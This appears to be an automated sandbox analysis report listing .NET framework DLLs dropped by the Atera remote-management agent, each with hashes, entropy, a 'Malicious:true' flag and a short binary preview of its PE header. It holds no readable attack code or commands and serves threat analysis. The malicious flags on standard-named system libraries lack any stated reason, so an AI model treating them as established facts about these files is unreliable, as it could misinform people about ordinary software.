                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.81431788734543
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:qe1WmRWgFNyb8E9VF6IYijSJIVxaHgPEA:qejjBEpYi60kqEA
                                                                                                                                                                                                                                        MD5:21BEF3F4F15A1822C8FA427F40E2E79D
                                                                                                                                                                                                                                        SHA1:141C4EA316AB0545A466A0CA4C5F5062A0E0A68F
                                                                                                                                                                                                                                        SHA-256:BEF088DBBF9483B2548ED211FC1CE0FFA16AE4B91668186F31608E3FAA1E7FFB
                                                                                                                                                                                                                                        SHA-512:5A7BCE1DD016085FEB71B75324FBDC0A916A8146328CEA1A37A8941C368031C1C4DAFAD122276CA6044F66886454AEF2DBB6192BCF2BC861807BFDB3309385F2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................J.....@.................................p(..O....@..................((...`......8'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..h....................&......................................BSJB............v4.0.30319......l.......#~.. ...0...#Strings....P.......#US.T.......#GUID...d.......#Blob......................3............................................................f...........z.................y...../.....H.................c.....L.......,...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.(...K.H...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):142376
                                                                                                                                                                                                                                        Entropy (8bit):6.16075284902631
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:7UGrszKKLBFa9DvrJGeesIf3afNs2AldfIlq+:6BFd3/aFs2P
                                                                                                                                                                                                                                        MD5:FA5D0EC256AC2E57755EDCC47058A8A8
                                                                                                                                                                                                                                        SHA1:93061A3747CFBCAE4C5C5FFFDCF6546930CAB1BE
                                                                                                                                                                                                                                        SHA-256:7AE4AFC8B33E5E993C03C7725A8812576696B9B7C95F9D672F8F939174A41B89
                                                                                                                                                                                                                                        SHA-512:9455E1F16199FCA559F4B4FDAD752E565BE1F30005368FC22BAED4BF88341DC450AEE34D61D4B22B3AC2C44E418143433DC6855A121EB79E5D7F55CB2B927AFC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......{D....@.................................X...O.... ..0...............((...@...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):192552
                                                                                                                                                                                                                                        Entropy (8bit):6.11445818411225
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:9eruQlNGOhYq0AQcTvankc+8lbKta4FUPAT8xpRI454I/Kv6RpZ8dwPSgSbb:YW60VcTvakcXcApOL
                                                                                                                                                                                                                                        MD5:1AB2879DB7DA24FAF99F379A67F6F730
                                                                                                                                                                                                                                        SHA1:AE8E5D2A16A5942B76F4F419A3237D9D12744BF6
                                                                                                                                                                                                                                        SHA-256:470915316E008128CA5270D2729B9B242B18AC867A9F89977205648E52C3CC89
                                                                                                                                                                                                                                        SHA-512:19176F685CBCEBCE0B2936D1C89776FBC9E8C676C3DD86D802AB6264ED05FC500925496827B1F0C591B23EF7B96CB52357E54EE406D218F95F11DDFF5FCE7362
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.................. ........... ....................... ............@.....................................O.......h...............((........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........$..H...........$....,...........................................0..,........ ....1.r...ps0...z.............(.....s1...*.0..l........J.2..J.o2...2.r...ps0...z..Jo3....%36.o2....JY.2*..J.Xo3.....J.Xo3...(...... ........J.XT.*...J...XT.o3...*..o2....Y./..*..o3....%3 ...Xo3......Xo3...(.... .......*.*..0..=..........J...XT..%....J...XT.~..... ...._.c.....J...XT.~......._..*....0............02...91...A2...F1...a2...f1. ....*..91...F1...aY+...AY..X+...0Y...02...91...A2...F

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.834910700767253
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:F6ZWYLWBwNyb8E9VF6IYijSJIVxNNLkjrl:F6l4IEpYi60Wx
                                                                                                                                                                                                                                        MD5:BEC6497FC12067E3DA1309AC1143B464
                                                                                                                                                                                                                                        SHA1:BEB2D6D9A556303DA98A3D316F873ED52B1264AC
                                                                                                                                                                                                                                        SHA-256:0A6A71480332A3B00B8FD30F78136E01F1D90E72FFF130B85B26F309CEAC9B75
                                                                                                                                                                                                                                        SHA-512:1DBA61D1F8011A9500125CA4E05F9D8F677C712AD4044F648718AD7FE42183F7292DD0952311AA1805699B3D19E37EBDB283B03FA979ECBBEF81AAEB66D722BC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................T(..O....@.. ...............((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......0...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16424
                                                                                                                                                                                                                                        Entropy (8bit):6.791328656262828
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:41W1WMQWkMNyb8E9VF6IYijSJIVxuHYOj:j1yMEpYi60u1
                                                                                                                                                                                                                                        MD5:109F46F97EF7D2A7181E6ABBAD4C1A73
                                                                                                                                                                                                                                        SHA1:E91A52D5315AA20C244C7E604B5D0A20D2C54A97
                                                                                                                                                                                                                                        SHA-256:0C10372E5CF857E8752AA4799381311FA84C04C83CBBF7B8EA80361617771103
                                                                                                                                                                                                                                        SHA-512:388A28D9C85625EAC37C848F8CA5643ECB91D20823493BB4B4198AF143263749677040A40ECFFC97F4E6C6A94E8A76AC8F9172BD821C4EE9FAF3F5123D26C64A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............,... ...@....... ..............................dY....@..................................,..O....@..@...............((...`......p+............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....t.......#US.x.......#GUID...........#Blob......................3................................!...............E.................%.................'...........e.....~...........................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Ping.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.832241980610204
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:rQ/rx72WSKW5TPZNyby2sE9jBF6IYiYF85S35IVnxGUHFA/PLtL:0dSWSKW1BNyb8E9VF6IYijSJIVxsLtL
                                                                                                                                                                                                                                        MD5:991020E4E7768EFA290D127DC5D88C4D
                                                                                                                                                                                                                                        SHA1:CD1583C286DEA25E234B94F5D39CCB571A03D2AA
                                                                                                                                                                                                                                        SHA-256:375D1FD5653B2BB866435DCFCB9387D34E43A2A8C779FE17A6F7C42986EED973
                                                                                                                                                                                                                                        SHA-512:8754C64EEA0E131B90A16B261CB4AAFCEB7F663AD00E1CD6DC463CFEC7AFA3497B9756AA1B8947E3FDE8CEFC098BCCBC334B67633A34FF467F1EF10F4BA15C1E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..................((...`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...L...#Strings....l.......#US.p.......#GUID...........#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16424
                                                                                                                                                                                                                                        Entropy (8bit):6.744707960924502
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:xJEYA2WkIWcqNyb8E9VF6IYijSJIVx1IZz2C:xyYA8CqEpYi60+ZV
                                                                                                                                                                                                                                        MD5:609041C0188E3DF3A8742E479ECB3B48
                                                                                                                                                                                                                                        SHA1:A9D1FEFE61F6B91B9D87F775150119D0A3673886
                                                                                                                                                                                                                                        SHA-256:6DA72A845BED9581C538BAB8684C31BCA00B4DAA7EDBD7B5D3DD5F92C7F6C799
                                                                                                                                                                                                                                        SHA-512:C5D7AFCC83A6D145AD30D2D804562461E9E695AE93D1C4F05760EC0B7D316CA1998B1C4AB912E4039FB1ADAABB973FF559168F8EB2EDED3C58D6AF89DA5EE0E9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ..............................R.....@................................. ,..O....@..................((...`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l.......#~..|...x...#Strings............#US.........#GUID...........#Blob......................3......................................$.........N.U.....U.....-...u.................0...........n.........................>.......................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.874085333467112
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:Vl0qgopJ5xBcWe4W5JPwNyby2sE9jBF6IYiYF85S35IVnxGUHFVOEQkuNq:XJGWe4WTYNyb8E9VF6IYijSJIVx5OzQ
                                                                                                                                                                                                                                        MD5:ABD711617A4E2C64977A3ACE0123CC84
                                                                                                                                                                                                                                        SHA1:03188191D332E3222E1492CDEC32930A1D705C25
                                                                                                                                                                                                                                        SHA-256:633FC7289FACBD96052CB7A51303633FFBFAC2110A3C6101589E46D4A655B95A
                                                                                                                                                                                                                                        SHA-512:E1C5A8950DD581E301007F1BFCDAA483F607777FF0E648E38C3D478B033680661CC199A603D65F2D7D3B08695897026A36FAD9D1D3CBA3CA50D266569B2EB091
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@.................................0)..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d)......H.......P ..(...................x'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings............#US.........#GUID...........#Blob......................3..................................................4...~.4...R.!...T.....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.783878066091884
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:adW1w3WesWn3Nyb8E9VF6IYijSJIVxV4yBM:P1wxd7EpYi60+MM
                                                                                                                                                                                                                                        MD5:7C34FE56430A8C273E6DC963445A13C6
                                                                                                                                                                                                                                        SHA1:999FDD2BB131DCB5882D6C6E5C53FF1946D1C3C2
                                                                                                                                                                                                                                        SHA-256:CB75C698D30AF2515BE2D804F5C99F6D00CA677861DD50D06527BAA178491622
                                                                                                                                                                                                                                        SHA-512:4623C99D59BCE3619CC473EBED84257BD96DE3BAC892DEC4668FA89E6FFDB3B6F40E0093D9CBC674913D396575ACD4424A13B729A6A6B8BC509D1C75D92DD1FE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............~*... ...@....... ....................................@.................................,*..O....@..................((...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`*......H.......P ..$...................t(......................................BSJB............v4.0.30319......l...$...#~......t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.<.....<.....<...C.<.....<.....<...[.<...x.<...-.......<.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24616
                                                                                                                                                                                                                                        Entropy (8bit):6.595542177965201
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:9ylNGlfdqj5531HJTABhf8g2MkO1ICMbmiT2Y4Y3ocWS9sWvW8YsW1gNyb8E9VFN:9yp12Bhkg3qnV/srYEpYi60RZ
                                                                                                                                                                                                                                        MD5:2F2705A28E19293E2918EC4A3490B78F
                                                                                                                                                                                                                                        SHA1:7BC61FDDC75486A8383D94E7E624F479041010F2
                                                                                                                                                                                                                                        SHA-256:CB74B1AA7057AC369FB545CD0DF01AE8A76CD0650DC01F9DC2CEF980D7F9FDE1
                                                                                                                                                                                                                                        SHA-512:AA225660906EC89E5D1358A1CEAF661F89EA1FFE14CD6B69D86D7C9E7249E06854BCA3B228FB3053155A101BBBECBAA2843CB50BD23B41C8257C0E04D9B43EF6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..*...........I... ...`....... ....................................@.................................gI..O....`...............8..((...........H............................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............6..............@..B.................I......H.......H(... ..................HH.......................................0..J.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%......o....*...0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..K.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%.......o...+*..0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..L.......(....~....%-.&~..........s....%.....~....%-.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebHeaderCollection.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.852674050741342
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:YHPAW1bWieNyb8E9VF6IYijSJIVxJ54bg:crTmEpYi60V
                                                                                                                                                                                                                                        MD5:08ACDBB77FAF00362B38EEE3B1021005
                                                                                                                                                                                                                                        SHA1:83C33BA5ED2FB016E78EC21EB9ADD43F7D3CD86A
                                                                                                                                                                                                                                        SHA-256:78E6E083FF2741E8DD6AD3CD22E857354BEE8CB943E1416309E63333F251C791
                                                                                                                                                                                                                                        SHA-512:B61F0473190AE6C221B78956A9AB76F93C96F9A8E5E79D1FD259862037193D871ECD4924ACA3B3449380013D572FE5EC3473E31CAACE37C4D0FE491B33063E6A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................-....@..................................(..O....@..P...............((...`......P'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3......................................z...............\.....0.....3.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.8526653705597695
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zNoqWD7WJlNyb8E9VF6IYijSJIVxeYzRisP:zNofwhEpYi60VosP
                                                                                                                                                                                                                                        MD5:94F84A310A3300FFE8047189F2A6CCBC
                                                                                                                                                                                                                                        SHA1:4CC23D897F9F90E36EDDF224E54D69AFCAD0F395
                                                                                                                                                                                                                                        SHA-256:E05FBD11DC5FEC61899019D7836396A7C025E0D4FCCD9A0EB5EAA91D834EFC73
                                                                                                                                                                                                                                        SHA-512:43FCB0E681225AEE222CCC1EA3FF63A6AA4DD141653C910D3AD40C638A6BBFA6E2C8406CCA01D4FC2CCDB7465B53D33ADCCCCE320AB6A15207FAC8580AA3045F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................cN....@.................................|(..O....@..@...............((...`......D'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ..t....................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.864685620785427
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:GGETSAWUEWSWNyb8E9VF6IYijSJIVx6tEb7:sT18+EpYi60L7
                                                                                                                                                                                                                                        MD5:C0EB2AA399EC2C0D6ADB4EE6C5126636
                                                                                                                                                                                                                                        SHA1:EADC9C676E6408FBE7FAAB773E33702E894979E9
                                                                                                                                                                                                                                        SHA-256:50B1FA1556FA8989C11BE79BEDF036B883830E8454E4A4228A327122BCF6FBFF
                                                                                                                                                                                                                                        SHA-512:70A3DE2B1C4764A8871C00BC23CFCEB8C0CFDC4A9EA5AC66645CC339B655374A283BD2CFD9705472D61805370A5C8A3345E5B8557A6DB6D79049D709761F2204
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............B)... ...@....... ..............................".....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3............................................................T.....,.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):110120
                                                                                                                                                                                                                                        Entropy (8bit):5.51209301175418
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:uPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/Yb767:uWw0SUUKBM8aOUiiGw7qa9tK/Ybs
                                                                                                                                                                                                                                        MD5:ECB5AAC58404396112B354062BF74337
                                                                                                                                                                                                                                        SHA1:C8B6C9CF0D7AC71BF12C2CA870BD329A4FEF71B8
                                                                                                                                                                                                                                        SHA-256:754A2559DCB18CC759A00E1DF30EC834FDC07DCBB781AB141643ADAA5E0D2C80
                                                                                                                                                                                                                                        SHA-512:DC36305F501A35467310D2820FD2AEA642779DF19EEFC084D01EEBE28AF2831A8B5589EFC0693EB662A7CCAD0942926A9D55347963CC771C0D0D09C2B95DB1E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ...............................%....@.................................f...O.......................((.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.849436982000894
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ZcDagtDApWSKJWFrNyb8E9VF6IYijSJIVx4LsvqGQHU:ZPKBKnEpYi60NiGQHU
                                                                                                                                                                                                                                        MD5:3C31EE2B27F16A4B2452DCE791BD6F62
                                                                                                                                                                                                                                        SHA1:76DED6E5B11CB942BE9C4B87EF546071DD6F6AD1
                                                                                                                                                                                                                                        SHA-256:54ED63281C8D38FADFD8E7601782996FFBD9DAAD4C710E20C90F4E266C4C6F04
                                                                                                                                                                                                                                        SHA-512:56E6A7B7AC94493A86D68C35C910E92B895533AD694A416E3E6491E14AAA97491195A6C1D3F3DEB3C5A7CECEDFF4EA0EC65D495A65C652AF82F935F1F69122C1
